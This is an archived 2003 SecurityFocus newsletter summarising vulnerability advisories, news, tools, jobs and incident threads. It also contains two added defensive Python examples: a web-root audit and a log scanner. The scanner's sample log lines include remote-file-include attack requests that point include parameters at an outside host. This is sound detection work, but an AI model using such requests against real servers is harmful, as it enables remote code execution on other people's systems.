SecurityFocus Newsletter #185

From: Stephen Entwisle <se(at)securityfocus.com>
Date: Mon Feb 24 2003 - 14:51:29 EST


This issue sponsored by Verisign-The Value Of Trust

Secure Your Servers

Secure your servers with 128-bit SSL encryption! Grab your copy of VeriSign's FREE Guide, "Securing Your Web site for Business," and you'll learn everything you need to know about using 128-bit SSL to encrypt your e-commerce transactions, secure your corporate intranets and authenticate your Web sites. 128-bit SSL is serious security for your online business. Get it now!

http://www.verisign.com/cgi-bin/go.cgi?a=n09440117580057000


I. FRONT AND CENTER
  1. Exchange 2000 in the Enterprise: Tips and Tricks Part Three
  2. Secure MySQL Database Design
  3. Richard Clarke's Legacy of Miscalculation
  4. SecurityFocus DPP Program
  5. InfoSec World Conference and Expo/2003 (March 10-12, 2003, Orlando, FL)
II. BUGTRAQ SUMMARY
  1. Util-Linux mcookie Cookie Generation Weakness
  2. IndyNews delMediaFile() File Deletion Vulnerability
  3. IndyNews manageMedia() File Deletion Vulnerability
  4. IndyNews HTML Injection Vulnerability
  5. Apple MacOS Classic TruBlueEnvironment Environment Variable...
  6. Apple File Protocol iDrive Administrator Login Weakness
  7. PHP-Board User Password Disclosure Vulnerability
  8. Kietu Hit.PHP Remote File Inclusion Vulnerability
  9. DotBr PHPInfo Environment Information Disclosure Vulnerability
  10. DotBr Config.Inc Information Disclosure Vulnerability
  11. DotBr Exec.PHP3 Remote Command Execution Vulnerability
  12. DotBr System.PHP3 Remote Command Execution Vulnerability
  13. IBM Lotus Domino HTTP Redirect Buffer Overflow Vulnerability
  14. IBM Lotus Domino Web Server iNotes s_ViewName/Foldername...
  15. IBM Lotus iNotes ActiveX Control Buffer Overflow Vulnerability
  16. BisonFTP Long Command Denial of Service Vulnerability
  17. BisonFTP Information Disclosure Vulnerability
  18. Microsoft Riched20.dll Attribute Buffer Overflow Vulnerability
  19. PHP CGI SAPI Code Execution Vulnerability
  20. Netcharts Server Chunked Encoding Information Leakage...
  21. D-Forum Remote File Include Vulnerability
  22. BitchX Malformed RPL_NAMREPLY Denial Of Service Vulnerability
III. SECURITYFOCUS NEWS ARTICLES
  1. Airport limo firm allegedly hobbled by revenge hack
  2. How to get an ATM PIN number in 15 guesses
  3. Crypto attack against SSL outlined
  4. States take step toward sharing cyberthreat data
IV. SECURITYFOCUS TOP 6 TOOLS
  1. PlexCrypt v3.1
  2. Traffik tool Troll v0.7
  3. LinuxMagic magic-smtpd v0.7.0
  4. snortalog v1.7.0
  5. labrea v2.5b1
  6. Looper Event / Alert System v0.20
V. SECURITYJOBS LIST SUMMARY
  1. Technical security reconciliation (Thread)
  2. Internship in São Paulo / Brazil (Thread)
  3. Forensic and Information Security Analyst Looking for a home in...
  4. Systems Engineer - Application Level Security (Thread)
  5. Security Sales Professionals Needed (Thread)
  6. Looking for Job in Italy (Thread)
  7. Network Security Engineer - NJ (Thread)
  8. Needed Penetration Testers (Thread)
  9. Senior Security Consultant needed in Washington DC (Thread)
  10. looking for Security Professionals in India (Thread)
  11. Infrastructure Security Manager- Rhode Island (Thread)
  12. Sunny Florida - Application Security Engineer (Thread)
VI. INCIDENTS LIST SUMMARY
  1. Scans on TCP port 135 (Thread)
  2. Weird Profile in Documents and Settings (Thread)
  3. Distributed spam-based DoS in progress (Thread)
  4. Dead thread -- Distributed spam-based DoS in progress (Thread)
  5. port 17300 probe fingerprint analysis (Thread)
  6. Kuang2 strikes again, is it just me? (Thread)
  7. www.nopop.net (Thread)
  8. Web Defacement (Thread)
  9. mIRC Trojan Variant - port 445 worm/Trojan (Thread)
  10. ano@ano.com ftpd dip.t-dialin.net (Thread)
  11. Incidents list administrivia and introductions... (Thread)
  12. Spies on Your PC HDrv (Thread)
  13. ICMP Destination Unreachable, Administratively Prohibited...
  14. S4T4N1C Web Defacement (Thread)
VII. VULN-DEV RESEARCH LIST SUMMARY
  1. Call For Papers Announcement: Black Hat Briefings Amsterdam
  2. VisualBasic auditing2 (Thread)
  3. VisualBasic auditing (Thread)
  4. Is this an off-by-one overflow? (Thread)
  5. [argv] BitchX-353 Vulnerability (Thread)
  6. A different bash blues (Thread)
  7. glibc glob_filename() recurse call stack overflow (Re[2]: Bash...
  8. glibc glob_filename() recurse call stack overflow (Re[2]: Bash...
  9. Windows 2000 Static arp not static (Thread)
  10. Administrivia: Bash Blues (Thread)
  11. Bash Blues. (Thread)
VIII. MICROSOFT FOCUS LIST SUMMARY
  1. Windows2000 QuickLaunch (Thread)
  2. MS Software Update Service (Thread)
  3. AW: MS Software Update Service (Thread)
  4. Restricting CmdExec Rights to Sysadmin (Thread)
  5. Windows station permissions, remote control programs,lower...
  6. AW: Restricting CmdExec Rights to Sysadmin (Thread)
  7. [despammed] Defeating password cracking (Thread)
  8. Windows station permissions, remote control programs, lower...
  9. Defeating password cracking (Thread)
  10. Website inside or outside domain (Thread)
  11. Ye Olde OWA Topic (Was Website inside or outside domain)...
  12. Unhappy face icon on NT 4 workstation (Thread)
  13. SecurityFocus Microsoft Newsletter #125 (Thread)
  14. website inside or outside the domain? (Thread)
  15. Windows 2000 Static arp not static (Thread)
IX. SUN FOCUS LIST SUMMARY
  1. NO NEW POSTS FOR THE WEEK ENDING 02.21.03
X. LINUX FOCUS LIST SUMMARY
  1. entropy + openSSL question (Thread)
  2. LKM Trojan installed (Thread)
  3. openSSL Key generation (Thread)
XI. SPONSOR INFORMATION

I. FRONT AND CENTER

1. Exchange 2000 in the Enterprise: Tips and Tricks Part Three
By Timothy M. Mullen

This is the second installment in a two-part series on securing Exchange 2000 in the enterprise. The last segment addressed the security ramifications of publishing mail content to the Internet via Outlook Web Access. This installment will discuss configuring IPSec between front-end and back-end OWA Servers as well as headers.

http://online.securityfocus.com/infocus/1668

2. Secure MySQL Database Design
by Kristy Westphal

When it comes to installing software, secure design is often the last consideration. The first goal is usually just to get it to work. This is particularly true of databases. Databases are commonly referred to as the keys to the kingdom, meaning that once they are compromised, all the valuable data that is stored there could fall into the hands of the attacker. With this in mind, this article will discuss various methods to secure databases, specifically one of the most popular freeware databases in use today, MySQL.

http://online.securityfocus.com/infocus/1667

3. Richard Clarke's Legacy of Miscalculation
By George Smith

The outgoing cybersecurity czar will be remembered for his steadfast belief in the danger of Internet attacks, even while genuine threats developed elsewhere.

http://online.securityfocus.com/columnists/143

4. SecurityFocus DPP Program

Attention Universities!! Sign-up now for preferred pricing on the only global early-warning system for cyber attacks - SecurityFocus DeepSight Threat Management System.

Click here for more information:
http://www.securityfocus.com/corporate/products/dpsection.shtml

5. InfoSec World Conference and Expo/2003 (March 10-12, 2003, Orlando, FL)

Optional Workshops March 8, 9, 12, 13, & 14
Vendor Expo March 10 & 11

Solutions to today's security concerns; hands-on experts; blockbuster vendor expo; the CISO Executive Summit; invaluable networking opportunities. InfoSec World has it all!

Go to: http://www.misti.com/10/os03nl37inf.html

II. BUGTRAQ SUMMARY


1. Util-Linux mcookie Cookie Generation Weakness
BugTraq ID: 6855
Remote: Yes
Date Published: Feb 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6855
Summary:

util-linux is a freely available, open source software package that provides some implementations of standard UNIX utilities, such as login. Included with util-linux is the mcookie utility that is used to generate random cookies for use with X authentication.

A weakness has been reported for the mcookie utility where cookies may be generated in a predictable manner. The weakness occurs because mcookie uses /dev/urandom to generate cookies.

This may be exploited by an attacker to guess cookie values to steal credentials of users who use X authentication.

Information obtained in this manner may be used by the attacker to launch further attacks against vulnerable systems and users.

2. IndyNews delMediaFile() File Deletion Vulnerability
BugTraq ID: 6856
Remote: Yes
Date Published: Feb 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6856
Summary:

IndyNews is a module designed for integration with the PHP-Nuke web portal software.

A vulnerability has been discovered in the IndyNews module available for PHP-Nuke. The problem occurs in the delMediaFile() function and may allow an unauthorized attacker to delete media files. The susceptible files are only those that have been included in an approved article. This issue could be exploited to obstruct a website's ability to distribute various files.

The precise technical details regarding this vulnerability are currently unknown. This BID will be updated accordingly as more information is made available.

3. IndyNews manageMedia() File Deletion Vulnerability
BugTraq ID: 6857
Remote: Yes
Date Published: Feb 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6857
Summary:

IndyNews is a module designed for integration with the PHP-Nuke web portal software.

A vulnerability has been discovered in the IndyNews module available for PHP-Nuke. The problem occurs in the manageMedia() function and may allow an unauthorized attacker to delete or modify various files.

Exploitation of this issue may allow an attacker to influence the upload location of remote PHP files, potentially making it possible to execute arbitrary PHP commands.

The precise technical details regarding this vulnerability are currently unknown. This BID will be updated accordingly as more information is made available.

4. IndyNews HTML Injection Vulnerability
BugTraq ID: 6858
Remote: Yes
Date Published: Feb 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6858
Summary:

IndyNews is a module designed for integration with the PHP-Nuke web portal software.

A vulnerability has been discovered in the IndyNews module available for PHP-Nuke. Due to insufficient sanitization of HTML tags it is possible to embed HTML code within the 'alt' tags of a news article. When the news article is viewed by an unsuspecting user the embedded code will be executed within the context of the site visited.

This issue could be exploited by taking advantage of a bug found in the editMediaDescr() and editMediaTempDescr() functions. Through the malicious use of these functions it is possible for an unauthorized user to modify the 'alt' tags of a proposed or already displayed news article.

The precise technical details regarding this vulnerability are currently unknown. This BID will be updated accordingly as more information is made available.

5. Apple MacOS Classic TruBlueEnvironment Environment Variable Privilege Escalation Vulnerability
BugTraq ID: 6859
Remote: No
Date Published: Feb 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6859
Summary:

Apple MacOS X includes a Classic emulator to support applications written for Classic versions of the operating system.

Apple has released a client security update which details a vulnerability in the Apple MacOS Classic environment for MacOS X, which may lead to elevation of privileges. This issue exists in TruBlueEnvironment, which is included in the emulator.

It has been reported that an environment variable used by TruBlueEnvironment may be changed to cause arbitrary local files to be overwritten or created. The environment variable is used to define a location to output debugging information to a file.

TruBlueEnvironment will create or overwrite the debugging file with world-writeable privileges, depending on the umask of the process creating the file. The file will not be executable when it is created. However, a facility such as cron may potentially run the file through a shell interpreter. This may cause the file to run with elevated privileges, resulting in privilege escalation. A denial of service is also possible if critical system files are corrupted by the attacker.

6. Apple File Protocol iDrive Administrator Login Weakness
BugTraq ID: 6860
Remote: Yes
Date Published: Feb 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6860
Summary:

Apple File Protocol (AFP) is used with Apple's 'iDisk' feature to allow systems to store files on Apple's site.

The AFP allows a system administrator to log onto a system as a normal user using administration credentials. This is the default behaviour. When authenticating, it is possible for an attacker to obtain the administrator credentials by intercepting data.

Further details about this issue are not known at this time. This BID will be updated as further information becomes available.

7. PHP-Board User Password Disclosure Vulnerability
BugTraq ID: 6862
Remote: Yes
Date Published: Feb 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6862
Summary:

php-board is web forum software.

A vulnerability has been reported in php-board which may disclose sensitive information to remote attackers. This flaw exists in the 'login.php' script.

php-board user information is stored in flat files on the system hosting the software. Access to the files via the web is not sufficiently restricted. Remote attackers may request user files and gain access to php-board user and administrative passwords. The attacker must know the name of the user whose file they are requesting.

The attacker may use the disclosed credentials to perform actions on the php-board system as the user.

8. Kietu Hit.PHP Remote File Inclusion Vulnerability
BugTraq ID: 6863
Remote: Yes
Date Published: Feb 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6863
Summary:

Kietu is web-based software for tracking web site usage statistics. It is implemented in PHP.

A flaw in the Kietu 'hit.php' script may permit remote attackers to include malicious remote files. Remote users may influence the include path for the 'config.php' configuration file. An attacker may exploit this to include a malicious PHP script named 'config.php' from a remote host, resulting in execution of arbitrary commands with the privileges of the webserver process.

9. DotBr PHPInfo Environment Information Disclosure Vulnerability
BugTraq ID: 6864
Remote: Yes
Date Published: Feb 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6864
Summary:

DotBr is a web application implemented in PHP. It includes features to allow websites to host a poll.

DotBr may disclose sensitive information to remote attackers about the environment of the system hosting the software. This is due to the use of the PHP phpinfo() function in the 'foo.php3' script. This may disclose version information and path information to the attacker.

This information may be helpful in mounting further attacks against the system.

10. DotBr Config.Inc Information Disclosure Vulnerability
BugTraq ID: 6865
Remote: Yes
Date Published: Feb 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6865
Summary:

DotBr is a web application implemented in PHP. It includes features to allow websites to host polls. DotBr is backended by a MySQL database.

The DotBr configuration file (config.inc) may potentially disclose sensitive information to remote attackers. This issue occurs because the configuration file does not have the proper PHP file extension in the default installation, and may be displayed by the webserver instead of handled by the PHP interpreter. Database authentication credentials and other information may be disclosed as a result.

The attacker may use this information in attempts to gain unauthorized access to other resources.
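
A check for the condition described in this entry, as an added example that is not part of the original newsletter or of DotBr: it walks a web root and reports files that contain PHP source but whose extension would not be passed to the PHP interpreter. The handled-extension set, the credential-variable pattern and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Assumption: the extensions this server hands to the PHP interpreter.
# Take the real list from the web server's handler configuration.
PHP_HANDLED = frozenset({".php", ".php3", ".php4", ".phtml"})

# "<?php", "<?=" or a short open tag followed by whitespace (not "<?xml").
PHP_OPEN_TAG = re.compile(rb"<\?(?:php|=|\s)", re.IGNORECASE)
# Assumption: variable names that commonly hold database credentials.
SECRET_ASSIGN = re.compile(
    rb"\$\w*(?:pass|pwd|dbuser|db_user|dbhost|db_host)\w*\s*=", re.IGNORECASE
)


def audit_webroot(root, handled=PHP_HANDLED, max_bytes=65536):
    """Return files under root that hold PHP source but would be served as text."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            ext = os.path.splitext(name)[1].lower()
            if ext in handled:
                continue  # the interpreter runs these, so source is not sent
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(max_bytes)
            except OSError:
                continue  # unreadable by the auditor; skip it
            if PHP_OPEN_TAG.search(head):
                findings.append({
                    "path": os.path.relpath(path, root),
                    "extension": ext,
                    "has_credentials": bool(SECRET_ASSIGN.search(head)),
                })
    return sorted(findings, key=lambda f: f["path"])


def build_sample_tree(root):
    """Create a constructed sample web root (not DotBr's real file contents)."""
    samples = {
        "config.inc": '<?php $dbhost = "localhost"; $dbpass = "example-only"; ?>\n',
        "config.php": '<?php $dbpass = "example-only"; ?>\n',
        "index.php3": '<?php include("config.inc"); ?>\n',
        os.path.join("lib", "poll.inc"): "<?php function tally($v) { return $v + 1; } ?>\n",
        "style.css": "body { color: black; }\n",
    }
    for rel, text in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="ascii") as fh:
            fh.write(text)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as webroot:
        build_sample_tree(webroot)
        for item in audit_webroot(webroot):
            flag = "CREDENTIALS" if item["has_credentials"] else "source only"
            print(f'{item["path"]}: served as plain text ({flag})')
```

Any file reported here should be given a handled extension, denied by the web server, or moved outside the document root.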

11. DotBr Exec.PHP3 Remote Command Execution Vulnerability
BugTraq ID: 6867
Remote: Yes
Date Published: Feb 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6867
Summary:

DotBr is a web application implemented in PHP. It includes features to allow websites to host polls.

The DotBr 'exec.php3' script is prone to a remote command execution vulnerability. This is due to insufficient sanitization of user-supplied data before it is passed through the PHP passthru() function. If exploited, the function will invoke the underlying shell with attacker-supplied parameters.

Exploitation may result in execution of arbitrary shell commands with the privileges of the webserver process.

12. DotBr System.PHP3 Remote Command Execution Vulnerability
BugTraq ID: 6866
Remote: Yes
Date Published: Feb 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6866
Summary:

DotBr is a web application implemented in PHP. It includes features to allow websites to host polls.

The DotBr 'system.php3' script is prone to a remote command execution vulnerability. This is due to insufficient sanitization of user-supplied data before it is passed through the PHP system() function. If exploited, the function will invoke the underlying shell with attacker-supplied parameters.

Exploitation may result in execution of arbitrary shell commands with the privileges of the webserver process.

13. IBM Lotus Domino HTTP Redirect Buffer Overflow Vulnerability
BugTraq ID: 6870
Remote: Yes
Date Published: Feb 17 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6870
Summary:

Lotus Domino Server is an application framework for web based collaborative software. It runs on multiple platforms including Microsoft Windows and Unix.

It has been reported that Lotus Domino 6 is affected by a buffer overflow vulnerability. The condition occurs when the server constructs an HTTP redirect response.

According to the report, the client-supplied "HOST" HTTP header field is copied into a local buffer without bounds checking. Consequently, a buffer overflow occurs if the HOST parameter is of excessive length.

Attackers may exploit this vulnerability by identifying and then requesting, with a malicious HOST parameter in the request header, a specific document that causes the server to respond with a redirect.

Successful exploitation of this vulnerability may result in attackers gaining control of affected servers.

14. IBM Lotus Domino Web Server iNotes s_ViewName/Foldername Buffer Overflow Vulnerability
BugTraq ID: 6871
Remote: Yes
Date Published: Feb 17 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6871
Summary:

Lotus Domino Server is an application framework for web based collaborative software. It runs on multiple platforms including Microsoft Windows and Unix.

Lotus Domino iNotes Web Server does not perform adequate bounds checking on the s_ViewName/Foldername options of the PresetFields parameter. A buffer overflow condition can occur if excessively long strings are supplied as values for these fields when requesting web based mail services. This could result in sensitive areas of memory being overwritten to allow attacker-supplied code to be executed. This code would be executed in the security context of the account running the Domino Web Services.

15. IBM Lotus iNotes ActiveX Control Buffer Overflow Vulnerability
BugTraq ID: 6872
Remote: Yes
Date Published: Feb 17 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6872
Summary:

IBM Lotus iNotes is a web based messaging/collaboration application. Installation of support for iNotes on client systems includes an ActiveX control, "Lotus Domino Session ActiveX Control".

A buffer overflow vulnerability is reportedly present in this control. The condition is in the method "InitializeUsingNotesUserName()" and may be triggered if the method is called with a parameter of excessive length.

Malicious web content may invoke the control and exploit the vulnerability to execute instructions on target client systems. Furthermore, other applications which use the MSIE HTML rendering component may also be vulnerable if ActiveX support is enabled. It should be noted that any code executed would run with the privileges of the user who started MSIE.

16. BisonFTP Long Command Denial of Service Vulnerability
BugTraq ID: 6869
Remote: Yes
Date Published: Feb 17 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6869
Summary:

BisonFTP is an FTP daemon available for Windows based systems.

The BisonFTP daemon is prone to a denial of service condition when issued certain commands by the remote client.

If the client issues an FTP command such as 'cwd' or 'ls' containing 4300 bytes of data or more, the CPU usage on the system will increase to 100%. This results in the host being unavailable until the connection is closed by the client.

17. BisonFTP Information Disclosure Vulnerability
BugTraq ID: 6873
Remote: Yes
Date Published: Feb 17 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6873
Summary:

BisonFTP Server is an FTP daemon that is available for Windows based systems.

The BisonFTP server does not properly sanitize directory traversal sequences from user input. This allows users to issue an 'ls' command using the sequence '@../' in order to gain a file listing outside of the FTP root. Information obtained could be used to mount further attacks against the system.

18. Microsoft Riched20.dll Attribute Buffer Overflow Vulnerability
BugTraq ID: 6874
Remote: No
Date Published: Feb 17 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6874
Summary:

Rich Text Format (RTF) files are parsed by the riched20.dll library on Windows platforms. This library is included in most versions of Windows and may also be installed by other applications that are required to parse .rtf files.

Reportedly, it is possible to overrun a buffer in riched20.dll, causing the calling application (such as Microsoft Outlook or Word) to fail. This buffer can be overrun by including more than 65536 bytes of data in an attribute label contained in the .rtf file. Arbitrary code execution may be possible.

This vulnerability may be related to BID 807.

Some reports indicate that this vulnerability could not be reproduced on riched20.dll v.3.0 (5.30.23.1200) running on Windows NT.

19. PHP CGI SAPI Code Execution Vulnerability
BugTraq ID: 6875
Remote: Yes
Date Published: Feb 17 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6875
Summary:

PHP is a freely available, open source web scripting language package. It is available for Microsoft Windows, Linux, and Unix operating systems.

An unspecified vulnerability has been reported in the CGI SAPI of PHP version 4.3.0.

Direct access to the CGI binary can be prevented by using the configuration option '--enable-force-cgi-redirect' and the php.ini option 'cgi.force_redirect'.

The report states that an unspecified bug could render these options useless, allowing a remote user to directly access the CGI binary. This could allow an attacker to read any file that is readable by the web server user, or to potentially execute arbitrary PHP code. The attacker would have to be able to inject the PHP code into a file accessible by the CGI binary, such as the web server access logs.

20. Netcharts Server Chunked Encoding Information Leakage Vulnerability
BugTraq ID: 6877
Remote: Yes
Date Published: Feb 18 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6877
Summary:

NetCharts Server provides multi-platform data connectivity, combining a servlet engine, graphics engine and scheduling features.

It has been reported that Netcharts Server is unable to sufficiently handle invalid chunked encoded HTTP requests.

Although query-response communication timing is reportedly difficult to predict, one scenario may be an attacker attempting to desynchronize the Netcharts server in order to lead valid Netcharts Server users to a specified response. The attacker may achieve this condition by flooding the Netcharts Server communication channels with an attacker-supplied response.

This may lead to sensitive information leakage or network performance degradation as a result of the attacker's attempts to exploit this condition.

21. D-Forum Remote File Include Vulnerability
BugTraq ID: 6879
Remote: Yes
Date Published: Feb 18 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6879
Summary:

D-Forum is a freely available discussion forum written in PHP.

D-Forum is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the header.php3 and footer.php3 pages existing in the /includes folder.

Under some circumstances, it is possible for remote attackers to influence the include path for these scripts to point to an external file on a remote server by manipulating the '$my_header' and '$my_footer' URI parameters.

If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the webserver.
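
Detection logic for the requests this entry describes, as an added example that is not part of the original newsletter or of D-Forum: it scans web server access log lines for requests to the two include scripts in which 'my_header' or 'my_footer' carries a remote location. The Common Log Format layout, the addresses and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Common Log Format prefix; anything after the status code is ignored.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Scripts and parameters named in the advisory text.
SCRIPTS = ("/includes/header.php3", "/includes/footer.php3")
PARAMS = {"my_header", "my_footer"}
# A value is treated as remote if it starts with "scheme://" or "//".
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)

# Constructed sample log lines using documentation address ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Feb/2003:10:01:02 -0500] "GET /forum/index.php3 HTTP/1.0" 200 5120',
    '203.0.113.5 - - [18/Feb/2003:10:02:10 -0500] '
    '"GET /forum/includes/header.php3?my_header=http://198.51.100.7/h.txt HTTP/1.0" 200 312',
    '203.0.113.5 - - [18/Feb/2003:10:02:11 -0500] '
    '"GET /forum/includes/footer.php3?my_footer=%68ttp%3A%2F%2F198.51.100.7%2Ff.txt HTTP/1.0" 200 98',
    '192.0.2.44 - - [18/Feb/2003:10:05:40 -0500] '
    '"GET /forum/includes/header.php3?my_header=header_local.php3 HTTP/1.0" 200 700',
    '192.0.2.44 - - [18/Feb/2003:10:06:02 -0500] '
    '"GET /news/view.php?my_header=http://example.org/ HTTP/1.0" 404 0',
]


def find_remote_includes(lines):
    """Return one record per request that points an include parameter off-host.

    Only the query string is inspected, because POST bodies and cookies do
    not appear in an access log.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable request line
        url = urlsplit(m.group("target"))
        if not unquote(url.path).lower().endswith(SCRIPTS):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = unquote(value)  # second decode pass catches double encoding
            if name in PARAMS and REMOTE_RE.match(value):
                hits.append({
                    "client": m.group("client"),
                    "when": m.group("when"),
                    "script": url.path,
                    "param": name,
                    "value": value,
                    "status": int(m.group("status")),
                })
    return hits


if __name__ == "__main__":
    for hit in find_remote_includes(SAMPLE_LOG):
        print("{client} {when} {script} {param}={value} -> {status}".format(**hit))
```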

22. BitchX Malformed RPL_NAMREPLY Denial Of Service Vulnerability
BugTraq ID: 6880
Remote: Yes
Date Published: Feb 18 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6880
Summary:

BitchX is a freely available, open source IRC client. It is available for Unix, Linux, and Microsoft operating systems.

A problem with BitchX could make it possible for a malicious IRC server to crash a vulnerable client.

It has been reported that BitchX does not properly handle some types of replies contained in the RPL_NAMREPLY numeric. When a malformed reply is received by the client, the client crashes, resulting in a denial of service.

The problem occurs through the handling of the 353 IRC numeric. It is suspected that this vulnerability may also make possible the execution of arbitrary code. In the event that this is possible, code executed through this vulnerability would be in the context of the BitchX user. This could allow a remote attacker access to the system on which the affected client is running with the privileges of the BitchX user.

III. SECURITYFOCUS NEWS AND COMMENTARY


1. Airport limo firm allegedly hobbled by revenge hack
By Kevin Poulsen

Terminated network administrator is charged with a retaliatory strike against former employer's systems.

http://online.securityfocus.com/news/2567

2. How to get an ATM PIN number in 15 guesses
By John Leyden, The Register

Cambridge researchers have documented a worrying PIN cracking technique against the hardware security modules commonly used by bank ATMs.

http://online.securityfocus.com/news/2584

3. Crypto attack against SSL outlined
By John Leyden, The Register

Swiss security researchers have discovered an attack against implementations of the ubiquitous SSL protocol that could potentially compromise email passwords, though not ecommerce transactions.

http://online.securityfocus.com/news/2583

4. States take step toward sharing cyberthreat data
By William Jackson, TechNews.com

Thirteen states, led by New York, last weekend conducted a communications exercise that could lead to a new, multistate information sharing and analysis center.

http://online.securityfocus.com/news/2553

IV. SECURITYFOCUS TOP 6 TOOLS


1. PlexCrypt v3.1
by plexobject
Relevant URL:
http://www.plexobject.com/software/plexcrypt/index.html
Platforms: AIX, HP-UX, IRIX, Linux, POSIX, Solaris, SunOS, Windows 2000, Windows 95/98, Windows NT
Summary:

PlexCrypt is a GUI that allows a set of files or folders to be compressed using the Zip format. In addition, it encrypts and decrypts a set of files or a set of folders using AES, Blowfish, CAST, DES, ElGamal, IDEA, IES, RC4, RC6, RSA, Rijndael, Serpent, Skipjack, Twofish, etc. It allows users to create digital signatures and digest and verify them. It also allows users to create and manage digital certificates for encryption and signatures.

2. Traffik tool Troll v0.7
by Alexander Newald alexander@newald.de
Relevant URL:
http://linux.newald.de/
Platforms: N/A
Summary:

The Traffik Tool Troll is a traffic monitoring and managing script. Traffic statistics are generated by port, hour, day, month, and year. You can define a special period for your needs. The script is written in Perl and uses iptables and MySQL to get and store the traffic.

3. LinuxMagic magic-smtpd v0.7.0
by LinuxMagic Inc. magicsmtpd@linuxmagic.com
Relevant URL:
http://www.linuxmagic.com/opensource/magicmail/magic-smtpd/
Platforms: Linux, POSIX
Summary:

MAGIC-SMTPD is a drop-in replacement for Dan Bernstein's qmail-smtpd, and was originally designed to be part of the LinuxMagic Magic Mail Server. This opensource version has been released to allow others to benefit from its anti-spam components, and valid user checking to reduce server loads and spam volumes. It is designed to support stock qmail installations, qmail/vpopmail installations, and database connectivity. Designed for ISP service, this will work for all mail servers large and small.

4. snortalog v1.7.0
by jeremy chartier
Relevant URL:
http://jeremy.chartier.free.fr/snortalog/
Platforms: UNIX
Summary:

Snortalog (formerly known as Snort-ng) is a powerful Perl script that summarizes Snort logs, making it easy to view any network attacks detected by Snort. It can generate charts in HTML. It works with all versions of Snort, and can analyze logs in two formats: syslog alerts and text alerts. It does not include a database for maximum performance.

5. labrea v2.5b1
by Tom Liston tliston@hackbusters.net
Relevant URL:
http://labrea.sourceforge.net/
Platforms: Os Independent
Summary:

labrea is a program that creates a "sticky honeypot" by taking over unused IP addresses on a network and creating virtual machines that answer to connection attempts. labrea answers those connection attempts in a way that causes the machine at the other end to get "stuck", sometimes for a very long time.

6. Looper Event / Alert System v0.20
by Mohit Muthanna bugs@muthanna.com
Relevant URL:
http://looper.sourceforge.net/
Platforms: AIX, FreeBSD, HP-UX, Linux, OpenBSD, Solaris, SunOS
Summary:

Looper is a highly modularized application designed to simplify the event / alert model. Primarily used for Network Management, this application can be used to accomplish a variety of tasks related to logging and alerting such as listening for SNMP traps and logging to a file or sending notification to Netcool (a la "trapd probe"), reading a log file for alerts and sending notification via e-mail, parsing syslogs and sending notifications to Netcool (a la "syslog probe"), etc. Looper can also be used as an ad-hoc Netcool probe or Gateway.

V. SECURITY JOBS SUMMARY


  1. Technical security reconciliation (Thread) Relevant URL:

http://online.securityfocus.com/archive/77/312642

2. Internship in São Paulo / Brazil (Thread)
Relevant URL:

http://online.securityfocus.com/archive/77/312601

3. Forensic and Information Security Analyst Looking for a home in NYC (Thread)
Relevant URL:

http://online.securityfocus.com/archive/77/312574

4. Systems Engineer - Application Level Security (Thread)
Relevant URL:

http://online.securityfocus.com/archive/77/312573

5. Security Sales Professionals Needed (Thread)
Relevant URL:

http://online.securityfocus.com/archive/77/312478

6. Looking for Job in Italy (Thread)
Relevant URL:

http://online.securityfocus.com/archive/77/312475

7. Network Security Engineer - NJ (Thread)
Relevant URL:

http://online.securityfocus.com/archive/77/312418

8. Needed Penetration Testers (Thread)
Relevant URL:

http://online.securityfocus.com/archive/77/312384

9. Senior Security Consultant needed in Washington DC (Thread)
Relevant URL:

http://online.securityfocus.com/archive/77/312375

10. looking for Security Professionals in India (Thread)
Relevant URL:

http://online.securityfocus.com/archive/77/312374

11. Infrastructure Security Manager- Rhode Island (Thread)
Relevant URL:

http://online.securityfocus.com/archive/77/312373

12. Sunny Florida - Application Security Engineer (Thread)
Relevant URL:

http://online.securityfocus.com/archive/77/311925

VI. INCIDENTS LIST SUMMARY


1. Scans on TCP port 135 (Thread)
Relevant URL:

http://online.securityfocus.com/archive/75/312587

2. Weird Profile in Documents and Settings (Thread)
Relevant URL:

http://online.securityfocus.com/archive/75/312586

3. Distributed spam-based DoS in progress (Thread)
Relevant URL:

http://online.securityfocus.com/archive/75/312469

